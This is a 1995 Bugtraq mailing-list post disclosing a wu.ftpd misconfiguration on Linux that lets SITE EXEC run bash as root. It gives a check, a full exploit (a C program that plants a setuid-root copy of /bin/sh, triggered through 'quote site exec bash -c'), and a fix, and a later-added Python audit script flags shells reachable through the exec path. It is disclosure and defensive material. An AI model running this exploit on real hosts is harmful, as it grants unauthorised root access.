Bugtraq mailing list archives

Exploit for Linux wu.ftpd hole


From: H.Karrenbeld () ct utwente nl (Henri Karrenbeld)
Date: Wed, 5 Jul 1995 18:44:17 +0100


Since Bugtraq is exceptionally quiet lately, I thought I should make it
come alive again with this discussion of the bug that was reported in
the wu.ftpd that comes with some Slackware distributions of Linux.
The report was just before Bugtraq went down for a long time, but
I've found the bug still to be present on all the Linux machines that
I have access to. So maybe it needs to be brought a little more into
the open. Here we go:

ObBug: - Short description of the bug

It involves wu.ftpd being misconfigured at compile time and allowing
SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users
this is ~ftp/bin). Now if in this /bin resides a program that gives
access to executables outside /bin, but in the user's reach (such as
/bin/bash, which gives access to the user's homedir), this opens up
a root vulnerability. This should have been set to /bin/ftp-exec,
which is set by the _PATH_EXECPATH variable in src/pathnames.h before
compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the
net has this securely set as the default value.

- How to check?

$ ftp -n localhost
user: <userid>
password: <passwd>
ftp> quote site exec bash -c id

If vulnerable it gives here: uid=0, gid=0, euid=<yourid>, egid=<your-gids>

Of course, bash should not be available at all.

- How to exploit (in case your sysadmin or you think the above is not
  a problem)

Go to your homedir and make a program: duh.c (or whatever)

#include <stdlib.h>
#include <unistd.h>

int main(void) {
   seteuid(0);   /* the misconfigured daemon left the real uid at 0 */
   setegid(0);
   system("/bin/cp /bin/sh ./sh");
   system("/bin/chmod 6755 ./sh");
   return 0;
}

$ make duh
$ ftp -n localhost (and login)
user: <userid>
password: <passwd>
ftp> quote site exec bash -c duh
ftp> quit

$ ./sh

bash#

(voila, QED)

- How to fix?

Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive
doesn't compile on Linux) and compile it; you might want to define
_PATH_PIDNAMES and _PATH_XFERLOG to other values there (/usr/adm/ftp.pids-%s
and /usr/adm/xferlog, for example). If you cannot find that, I can email the
source to you, if you trust the source I took somewhere unmodified and
if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too.
I can remember that I got it that way.

$) Henri Karrenbeld
-----------------------------------------------------------------------------
Hardware, n.:
        The parts of a computer system that can be kicked.
-----------------------------------------------------------------------------
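As an added defender-side example (not part of this post or of wu-ftpd itself), the following Python audit reads the _PATH_EXECPATH setting out of a src/pathnames.h and then checks whether any shell is reachable inside that directory under the daemon's root ("/" for real users, ~ftp for chroot-ed anonymous users). The INTERPRETERS set, the SAFE_EXECPATH constant and the temporary ~ftp tree built by demo() are my assumptions, constructed for illustration.

```python
import os
import re
import tempfile

# Interpreters that, if reachable via SITE EXEC, let a user run anything in reach.
INTERPRETERS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "ash"}
SAFE_EXECPATH = "/bin/ftp-exec"  # the value the post says should be the default

def parse_execpath(pathnames_h):
    """Return the _PATH_EXECPATH value from src/pathnames.h text, or None."""
    m = re.search(r'^\s*#\s*define\s+_PATH_EXECPATH\s+"([^"]+)"', pathnames_h, re.M)
    return m.group(1) if m else None

def audit(pathnames_h, chroot="/"):
    """List findings for one build; empty list means the setting looks sane."""
    execpath = parse_execpath(pathnames_h)
    if execpath is None:
        return ["_PATH_EXECPATH is not defined in pathnames.h"]
    findings = []
    if os.path.normpath(execpath) != SAFE_EXECPATH:
        findings.append(f"_PATH_EXECPATH is {execpath}, expected {SAFE_EXECPATH}")
    real = os.path.join(chroot, execpath.lstrip("/"))   # resolve under the chroot
    if not os.path.isdir(real):
        return findings + [f"{real} does not exist under {chroot}"]
    for name in sorted(os.listdir(real)):
        path = os.path.join(real, name)
        if name in INTERPRETERS and os.access(path, os.X_OK):
            findings.append(f"interpreter {path} is reachable via SITE EXEC")
    return findings

def build_tree(root, execpath, names):
    """Create a constructed chroot tree holding executable dummy files."""
    d = os.path.join(root, execpath.lstrip("/"))
    os.makedirs(d, exist_ok=True)
    for n in names:
        p = os.path.join(d, n)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o755)

def demo():
    """Audit a constructed ~ftp tree: returns (weak findings, hardened findings)."""
    with tempfile.TemporaryDirectory() as ftp_root:   # stands in for ~ftp
        build_tree(ftp_root, "/bin", ["ls", "bash"])
        weak = audit('#define _PATH_EXECPATH "/bin"', chroot=ftp_root)
        build_tree(ftp_root, SAFE_EXECPATH, ["ls"])
        hardened = audit('#define _PATH_EXECPATH "/bin/ftp-exec"', chroot=ftp_root)
    return weak, hardened

if __name__ == "__main__":
    print(demo())
```

Run it against a real tree with audit(open("src/pathnames.h").read(), chroot="/home/ftp") to check the anonymous view, and with the default chroot for real users.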